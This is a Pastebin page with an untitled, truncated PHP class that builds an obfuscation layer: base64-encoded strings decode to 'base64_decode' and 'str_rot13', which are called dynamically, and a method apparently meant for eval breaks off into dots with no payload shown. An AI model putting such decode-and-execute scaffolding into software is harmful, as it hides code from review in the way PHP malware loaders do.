Guest User

Untitled

a guest
Feb 11th, 2023
33
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.70 KB | None | 0 0
  1. <?php
  2.  
  3. class file_01_encoded
  4. {
  5. public static function ___ac()
  6. {
  7. return get_class();
  8. }
  9.  
  10. public static function _($_)
  11. {
  12. $__ = base64_decode('YmFzZTY0X2RlY29kZQ==');
  13.  
  14. return $__($_);
  15. }
  16.  
  17. public static function _z($_)
  18. {
  19. $__ = self::_('c3RyX3JvdDEz');
  20.  
  21. return self::_($__($_));
  22. }
  23.  
  24. private static function _zx($_)
  25. {
  26. $_ = str_replace(['?', '!', '.', ',', '#'], ['Y', 'Z', 'R', 'a', 'v'], $_);
  27. $__ = self::_('c3RyX3JvdDEz');
  28.  
  29. return self::_($__($_));
  30. }
  31.  
  32. public static function _zxev()
  33. {
  34. $arg = func_get_args();
  35.  
  36. if (!empty($arg[0])) {
  37. ..........................................................
  38. .................................
  39. ...........................
Add Comment
Please, Sign In to add comment